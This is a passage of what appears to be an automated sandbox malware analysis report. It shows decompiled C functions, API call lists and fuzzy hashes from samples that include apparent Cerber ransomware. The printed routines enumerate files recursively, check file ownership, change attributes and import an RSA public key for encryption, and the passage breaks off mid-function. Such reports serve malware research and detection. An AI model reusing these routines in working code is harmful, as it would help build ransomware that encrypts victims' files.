                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: gethostbynamewsprintf
                                                                                                                                                                                        • String ID: %u.%u.%u.%u
                                                                                                                                                                                        • API String ID: 3411498959-1542503432
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B7E69(WCHAR* _a4) {
                                                                                                                                                                                        				void* _t4;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t4 = 0;
                                                                                                                                                                                        				if(PathCombineW(_a4, L"C:\\Windows\\", L"cscc.dat") != 0) {
                                                                                                                                                                                        					_t4 = 1;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                        			}





                                                                                                                                                                                        APIs
                                                                                                                                                                                        • PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat,00000000,?,007B7EA6,?), ref: 007B7E7C
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CombinePath
                                                                                                                                                                                        • String ID: C:\Windows\$cscc.dat
                                                                                                                                                                                        • API String ID: 3422762182-1946977352
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B682F(void** _a4) {
                                                                                                                                                                                        				void* _t3;
                                                                                                                                                                                        				void* _t4;
                                                                                                                                                                                        				void** _t7;
                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t7 = _a4;
                                                                                                                                                                                        				if(_t7 != 0) {
                                                                                                                                                                                        					_t4 =  *_t7;
                                                                                                                                                                                        					if(_t4 != 0) {
                                                                                                                                                                                        						_t4 = HeapFree(GetProcessHeap(), 0, _t4);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t8 = _t7[1];
                                                                                                                                                                                        					if(_t8 != 0) {
                                                                                                                                                                                        						_t4 = HeapFree(GetProcessHeap(), 0, _t8);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					return _t4;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t3;
                                                                                                                                                                                        			}








                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000), ref: 007B6851
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B6854
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 007B6860
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B6863
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3859560861-0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

Control-flow Graph
[Control-flow graph of function 0040A419 omitted; legend: Executed / Not Executed]
                                                                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                                                                        			E0040A419(void* __ecx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, char* _a16) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				int _v16;
                                                                                                                                                                                        				struct _WIN32_FIND_DATAW _v612;
                                                                                                                                                                                        				short _v1132;
                                                                                                                                                                                        				struct _SECURITY_DESCRIPTOR _v2156;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                        				int _t55;
                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                        				intOrPtr _t68;
                                                                                                                                                                                        				WCHAR* _t70;
                                                                                                                                                                                        				WCHAR* _t72;
                                                                                                                                                                                        				int _t86;
                                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                                                        				char* _t106;
                                                                                                                                                                                        				void* _t107;
                                                                                                                                                                                        				int _t108;
                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t105 = _a4;
                                                                                                                                                                                        				if(_t105 == 0) {
                                                                                                                                                                                        					_t51 = GetFileAttributesW(_a8); // executed
                                                                                                                                                                                        					SetFileAttributesW(_a8, _t51 | 0x00002000); // executed
                                                                                                                                                                                        					_t54 = E0040591C( &E0040D8B0, 1, 0x126191fd);
                                                                                                                                                                                        					_t110 = _t109 + 0xc;
                                                                                                                                                                                        					_t55 = E00406390(_t54,  &_v1132, _a8);
                                                                                                                                                                                        					_pop(_t102);
                                                                                                                                                                                        					__eflags = _t55;
                                                                                                                                                                                        					if(_t55 != 0) {
                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t55 = E00409381(__ecx, _t105, 0);
                                                                                                                                                                                        					_t108 = _t55;
                                                                                                                                                                                        					if(_t108 != 0) {
                                                                                                                                                                                        						_push(_a8);
                                                                                                                                                                                        						_push(_t108);
                                                                                                                                                                                        						wsprintfW( &_v1132, E0040591C(0x40d7dc, 5, 0x3260f07e));
                                                                                                                                                                                        						_t110 = _t109 + 0x1c;
                                                                                                                                                                                        						E00405463(_t108);
                                                                                                                                                                                        						_t55 = GetFileAttributesW( &_v1132); // executed
                                                                                                                                                                                        						if((_t55 & 0x00000002) == 0) {
                                                                                                                                                                                        							_t102 =  &_v8;
                                                                                                                                                                                        							_v8 = 0x400;
                                                                                                                                                                                        							_t86 = GetFileSecurityW( &_v1132, 1,  &_v2156, 0x400,  &_v8); // executed
                                                                                                                                                                                        							if(_t86 == 0 || GetSecurityDescriptorOwner( &_v2156,  &_v12,  &_v16) == 0) {
                                                                                                                                                                                        								L6:
                                                                                                                                                                                        								 *((char*)(_t105 + 5)) = 1;
                                                                                                                                                                                        								_t88 = GetFileAttributesW( &_v1132); // executed
                                                                                                                                                                                        								SetFileAttributesW( &_v1132, _t88 | 0x00002000); // executed
                                                                                                                                                                                        								lstrcatW( &_v1132, 0x40cec8);
                                                                                                                                                                                        								L8:
                                                                                                                                                                                        								_t106 = _a16;
                                                                                                                                                                                        								if( *((char*)(_t106 + 1)) != 0) {
                                                                                                                                                                                        									L10:
                                                                                                                                                                                        									_t55 = FindFirstFileW( &_v1132,  &_v612); // executed
                                                                                                                                                                                        									_v8 = _t55;
                                                                                                                                                                                        									if(_t55 != 0xffffffff) {
                                                                                                                                                                                        										_t107 = 0;
                                                                                                                                                                                        										while(WaitForSingleObject( *0x42f834, 0) != 0) {
                                                                                                                                                                                        											if(E004063BC( &(_v612.cFileName)) != 0 || (_v612.dwFileAttributes & 0x00000400) != 0) {
                                                                                                                                                                                        												L25:
                                                                                                                                                                                        												_t63 = FindNextFileW(_v8,  &_v612); // executed
                                                                                                                                                                                        												if(_t63 != 0) {
                                                                                                                                                                                        													continue;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												break;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												if(_t107 != 0) {
                                                                                                                                                                                        													L17:
                                                                                                                                                                                        													CharLowerBuffW( &(_v612.cFileName), lstrlenW( &(_v612.cFileName)));
                                                                                                                                                                                        													if((_v612.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                        														_t68 = _v612.nFileSizeHigh;
                                                                                                                                                                                        														_t102 = _v612.nFileSizeLow;
                                                                                                                                                                                        														__eflags = _t68 -  *0x42f7ac; // 0x0
                                                                                                                                                                                        														if(__eflags < 0) {
                                                                                                                                                                                        															goto L25;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														if(__eflags > 0) {
                                                                                                                                                                                        															L22:
                                                                                                                                                                                        															__eflags =  *_t106;
                                                                                                                                                                                        															if( *_t106 == 0) {
                                                                                                                                                                                        																L24:
                                                                                                                                                                                        																_t70 = _a12(_t107,  &_v612, _t106);
                                                                                                                                                                                        																_t110 = _t110 + 0xc;
                                                                                                                                                                                        																__eflags = _t70;
                                                                                                                                                                                        																if(_t70 == 0) {
                                                                                                                                                                                        																	break;
                                                                                                                                                                                        																}
                                                                                                                                                                                        																goto L25;
                                                                                                                                                                                        															}
                                                                                                                                                                                        															_t72 = StrChrW( &(_v612.cFileName), 0x2e);
                                                                                                                                                                                        															__eflags = _t72;
                                                                                                                                                                                        															if(_t72 == 0) {
                                                                                                                                                                                        																goto L25;
                                                                                                                                                                                        															}
                                                                                                                                                                                        															goto L24;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														__eflags = _t102 -  *0x42f7a8; // 0x800
                                                                                                                                                                                        														if(__eflags < 0) {
                                                                                                                                                                                        															goto L25;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														goto L22;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													Sleep(1); // executed
                                                                                                                                                                                        													E0040A419(_t102, _t107,  &(_v612.cFileName), _a12, _t106); // executed
                                                                                                                                                                                        													_t110 = _t110 + 0x10;
                                                                                                                                                                                        													goto L25;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												_t107 = E0040A25A(lstrlenW(_a8), _t102, _a4, _a8, _t106);
                                                                                                                                                                                        												_t110 = _t110 + 0xc;
                                                                                                                                                                                        												if(_t107 == 0) {
                                                                                                                                                                                        													break;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												goto L17;
                                                                                                                                                                                        											}
                                                                                                                                                                                        										}
                                                                                                                                                                                        										return FindClose(_v8);
                                                                                                                                                                                        									}
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									_t55 = E004094DB( &_v1132);
                                                                                                                                                                                        									_pop(_t102);
                                                                                                                                                                                        									if(_t55 == 0) {
                                                                                                                                                                                        										goto L10;
                                                                                                                                                                                        									}
                                                                                                                                                                                        								}
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								_t55 = EqualSid(0x42fa80, _v12);
                                                                                                                                                                                        								if(_t55 == 0) {
                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t55;
                                                                                                                                                                                        			}



























                                                                                                                                                                                        APIs
                                                                                                                                                                                        • wsprintfW.USER32 ref: 0040A464
                                                                                                                                                                                          • Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
                                                                                                                                                                                          • Part of subcall function 00405463: RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
                                                                                                                                                                                          • Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1
                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0040A479
                                                                                                                                                                                        • GetFileSecurityW.KERNELBASE(?,00000001,?,00000400,?), ref: 0040A4A4
                                                                                                                                                                                        • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 0040A4BD
                                                                                                                                                                                        • EqualSid.ADVAPI32(0042FA80,?), ref: 0040A4CF
                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0040A4E8
                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040A4FB
                                                                                                                                                                                        • lstrcatW.KERNEL32(?,0040CEC8), ref: 0040A50D
                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,0040A367,00000000), ref: 0040A518
                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040A527
                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0040A586
                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000), ref: 0040A5A2
                                                                                                                                                                                        • lstrlenW.KERNEL32(?,0040A367), ref: 0040A5DB
                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 0040A602
                                                                                                                                                                                        • CharLowerBuffW.USER32(?,00000000), ref: 0040A610
                                                                                                                                                                                        • Sleep.KERNEL32(00000001), ref: 0040A621
                                                                                                                                                                                        • StrChrW.SHLWAPI(?,0000002E), ref: 0040A669
                                                                                                                                                                                        • FindNextFileW.KERNEL32(?,?), ref: 0040A690
                                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 0040A6A1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$Attributes$Find$ErrorLastSecuritylstrlen$BuffCharCloseDescriptorEqualFirstFreeHeapLowerNextObjectOwnerSingleSleepWaitlstrcatwsprintf
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3254900428-0
                                                                                                                                                                                        • Opcode ID: 95870538ed6e8c4d8f518e8b1f60f6a5127569b72ba2bff67243cf3724bafaf0
                                                                                                                                                                                        • Instruction ID: 6187f46a005a6f47ffa6dfcf539702b581d4e88321e0c337fcbf86212e5dcf34
                                                                                                                                                                                        • Opcode Fuzzy Hash: 95870538ed6e8c4d8f518e8b1f60f6a5127569b72ba2bff67243cf3724bafaf0
                                                                                                                                                                                        • Instruction Fuzzy Hash: F9618275900219ABDB209BA0DD49FDB777CBF04310F0445BAF909F2190EB3A9A65CF5A
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                        			E00409857(void* __ecx, void* __eflags) {
                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                        				struct _SHFILEINFOW _v708;
                                                                                                                                                                                        				short _v1222;
                                                                                                                                                                                        				short _v1228;
                                                                                                                                                                                        				char _v1748;
                                                                                                                                                                                        				struct _WIN32_FIND_DATAW _v2340;
                                                                                                                                                                                        				char _v2860;
                                                                                                                                                                                        				short _v3380;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                        				intOrPtr _t42;
                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                        				void* _t69;
                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t79 = __eflags;
                                                                                                                                                                                        				_t67 = __ecx;
                                                                                                                                                                                        				 *0x40eb10(0); // executed
                                                                                                                                                                                        				GetSystemDirectoryW( &_v1228, 0x104);
                                                                                                                                                                                        				_t74 = 0x2b4;
                                                                                                                                                                                        				SHGetFileInfoW( &_v1228, 0,  &_v708, 0x2b4, 0x400); // executed
                                                                                                                                                                                        				_t34 = E0040AF39(_t67, lstrlenW( &(_v708.szTypeName)) + _t32);
                                                                                                                                                                                        				_pop(_t68);
                                                                                                                                                                                        				_v8 = _t34;
                                                                                                                                                                                        				_v1222 = 0;
                                                                                                                                                                                        				SHGetFileInfoW( &_v1228, 0,  &_v708, 0x2b4, 0x400); // executed
                                                                                                                                                                                        				_t42 = E0040AF39(_t68, lstrlenW( &(_v708.szTypeName)) + _t40);
                                                                                                                                                                                        				_pop(_t69);
                                                                                                                                                                                        				_v12 = _t42;
                                                                                                                                                                                        				 *0x40e798(0, 8, 0, 0,  &_v1748); // executed
                                                                                                                                                                                        				_push( &_v1748);
                                                                                                                                                                                        				_push(E0040591C(0x40d7f4, 8, 0x9d46391f));
                                                                                                                                                                                        				_push( &_v3380);
                                                                                                                                                                                        				E00405A8E(0, 0x400, 0x2b4, _t79);
                                                                                                                                                                                        				_t77 = _t75 + 0x18;
                                                                                                                                                                                        				_t51 = FindFirstFileW( &_v3380,  &_v2340); // executed
                                                                                                                                                                                        				_t73 = _t51;
                                                                                                                                                                                        				_t80 = _t73 - 0xffffffff;
                                                                                                                                                                                        				if(_t73 != 0xffffffff) {
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_push( &(_v2340.cFileName));
                                                                                                                                                                                        						_push( &_v1748);
                                                                                                                                                                                        						_push(E0040591C(0x40ced4, 5, 0x7f642c43));
                                                                                                                                                                                        						_push( &_v2860);
                                                                                                                                                                                        						E00405A8E(0, _t73, _t74, _t80);
                                                                                                                                                                                        						_push(_v12);
                                                                                                                                                                                        						_push(_v8);
                                                                                                                                                                                        						_push( &_v2860);
                                                                                                                                                                                        						_t74 = E0040972C(0, _t73, _t74, _t80);
                                                                                                                                                                                        						_t77 = _t77 + 0x28;
                                                                                                                                                                                        						_t81 = _t74;
                                                                                                                                                                                        						if(_t74 != 0) {
                                                                                                                                                                                        							CharLowerBuffW(_t74, lstrlenW(_t74));
                                                                                                                                                                                        							E004096CC(_t69, _t81, _t74);
                                                                                                                                                                                        							_pop(_t69);
                                                                                                                                                                                        							E00405463(_t74);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					} while (FindNextFileW(_t73,  &_v2340) != 0);
                                                                                                                                                                                        					return FindClose(_t73);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t51;
                                                                                                                                                                                        			}

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00409866
                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00409878
                                                                                                                                                                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000400), ref: 00409899
                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 004098A6
                                                                                                                                                                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000400), ref: 004098D8
                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 004098E5
                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000008,00000000,00000000,?), ref: 00409909
                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00409948
                                                                                                                                                                                          • Part of subcall function 0040972C: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000408), ref: 004097E1
                                                                                                                                                                                          • Part of subcall function 0040972C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004097EE
                                                                                                                                                                                          • Part of subcall function 0040972C: PathFindExtensionW.SHLWAPI(?,?,?,?,?,?,?,?,?,?), ref: 00409814
                                                                                                                                                                                        • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 004099A0
                                                                                                                                                                                        • CharLowerBuffW.USER32(00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004099A8
                                                                                                                                                                                          • Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
                                                                                                                                                                                          • Part of subcall function 00405463: RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
                                                                                                                                                                                          • Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1
                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004099C2
                                                                                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 004099CD
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$Findlstrlen$Info$ErrorLastPath$BuffCharCloseDirectoryExtensionFirstFolderFreeHeapInitializeLowerNextSystem
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2493930338-0
                                                                                                                                                                                        • Opcode ID: 4554cd949ba8cf5e398bad19e7416b0ecb408134c179bc66daf30f81b9ed2ce3
                                                                                                                                                                                        • Instruction ID: 98bb2fb97e339870cc37db1ad270d3e311652f1936ccaf0b3fdcbc75b29e6f69
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4554cd949ba8cf5e398bad19e7416b0ecb408134c179bc66daf30f81b9ed2ce3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D4121B2901118ABDB10ABA0DD89EEF777CEB45314F0405B7B605F2051E6349F488F69
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                        			E0040B17E(char _a4) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                        				_t14 = E0040B11B();
                                                                                                                                                                                        				_t44 = _t14;
                                                                                                                                                                                        				if(_t14 != 0) {
                                                                                                                                                                                        					_t16 = E00405905(0x40d944, 0x11, 0xd0371e50);
                                                                                                                                                                                        					_t2 =  &_a4; // 0x4029e6
                                                                                                                                                                                        					_t36 = E00401127(0, E004032B8(E004031AF( *_t2, _t44, _t16), _t44));
                                                                                                                                                                                        					if(_t21 != 0) {
                                                                                                                                                                                        						_t3 =  &_v12; // 0x4029e6
                                                                                                                                                                                        						_v12 = 0;
                                                                                                                                                                                        						_t39 = E00401127(_t3, _t36);
                                                                                                                                                                                        						if(_t39 != 0) {
                                                                                                                                                                                        							_t7 =  &_v12; // 0x4029e6
                                                                                                                                                                                        							_v8 = 0;
                                                                                                                                                                                        							_v20 = 0;
                                                                                                                                                                                        							_t27 =  *0x40f918(0x10001, 8, _t39,  *_t7, 0x8000, 0,  &_v8,  &_v20); // executed
                                                                                                                                                                                        							if(_t27 != 0) {
                                                                                                                                                                                        								 *0x40f804( *0x42faf8, 1, _v8,  &_v16); // executed
                                                                                                                                                                                        								LocalFree(_v8);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							E00405463(_t39);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						E00405463(_t36);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v16;
                                                                                                                                                                                        			}














                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0040B11B: CryptAcquireContextW.ADVAPI32(0042FAF8,00000000,00000000,00000001,F0000000,0040B260,004029D6,?,00402726,00000000,004029D6,80C426C8,?,00000000), ref: 0040B134
                                                                                                                                                                                        • CryptDecodeObjectEx.CRYPT32(00010001,00000008,00000000,)@,00008000,00000000,?,?), ref: 0040B1FD
                                                                                                                                                                                        • CryptImportPublicKeyInfo.CRYPT32(00000001,?,?), ref: 0040B216
                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,80C426C8,?,?,?,004029E6,?,00000000,00000000), ref: 0040B21F
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Crypt$AcquireContextDecodeFreeImportInfoLocalObjectPublic
                                                                                                                                                                                        • String ID: )@$)@
                                                                                                                                                                                        • API String ID: 1445165286-924509997
                                                                                                                                                                                        • Opcode ID: cd229777a01e81c430f156ce5ec166d499d460593341b2e080af31e16312a2a1
                                                                                                                                                                                        • Instruction ID: ff3408afee1e7cb94f08fa9440ee7e9cb1970d792c828288a7f0ea7b6b935642
                                                                                                                                                                                        • Opcode Fuzzy Hash: cd229777a01e81c430f156ce5ec166d499d460593341b2e080af31e16312a2a1
                                                                                                                                                                                        • Instruction Fuzzy Hash: F0119372900208BBCB10EFA5DC85FDF7B78EB44754F0444BAF500B7191D7799A448B98
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                        			E00401423(void* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                        				struct _WIN32_FIND_DATAW _v612;
                                                                                                                                                                                        				short _v1132;
                                                                                                                                                                                        				char _v1652;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				short* _t29;
                                                                                                                                                                                        				int _t32;
                                                                                                                                                                                        				WCHAR* _t38;
                                                                                                                                                                                        				int _t44;
                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                        				int _t54;
                                                                                                                                                                                        				void* _t60;
                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                        				void* _t65;
                                                                                                                                                                                        				void* _t69;
                                                                                                                                                                                        				WCHAR* _t70;
                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t69 = __edx;
                                                                                                                                                                                        				_t70 = _a8;
                                                                                                                                                                                        				_t3 = lstrlenW(_t70) * 2; // 0x401634
                                                                                                                                                                                        				_t29 = _t70 + _t3 - 2;
                                                                                                                                                                                        				if( *_t29 == 0x5c) {
                                                                                                                                                                                        					 *_t29 = 0;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t32 = E00406390(0x40cec8,  &_v1132, _t70);
                                                                                                                                                                                        				_pop(_t65);
                                                                                                                                                                                        				if(_t32 == 0) {
                                                                                                                                                                                        					L14:
                                                                                                                                                                                        					return _t32;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t32 = FindFirstFileW( &_v1132,  &_v612); // executed
                                                                                                                                                                                        				_t63 = _t32;
                                                                                                                                                                                        				if(_t63 == 0xffffffff) {
                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					L4:
                                                                                                                                                                                        					if(E004063BC( &(_v612.cFileName)) == 0) {
                                                                                                                                                                                        						if((_v612.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                        							_t38 = E0040591C(0x40cecc, 5, 0x25f360d5);
                                                                                                                                                                                        							_t73 = _t73 + 0xc;
                                                                                                                                                                                        							__eflags = PathMatchSpecW( &(_v612.cFileName), _t38);
                                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                                        								_push( &(_v612.cFileName));
                                                                                                                                                                                        								_push(_t70);
                                                                                                                                                                                        								_push(E0040591C(0x40ced4, 5, 0x7f642c43));
                                                                                                                                                                                        								_push( &_a8);
                                                                                                                                                                                        								_t44 = E00405B0C(_t63, _t65, _t70, _t71, __eflags);
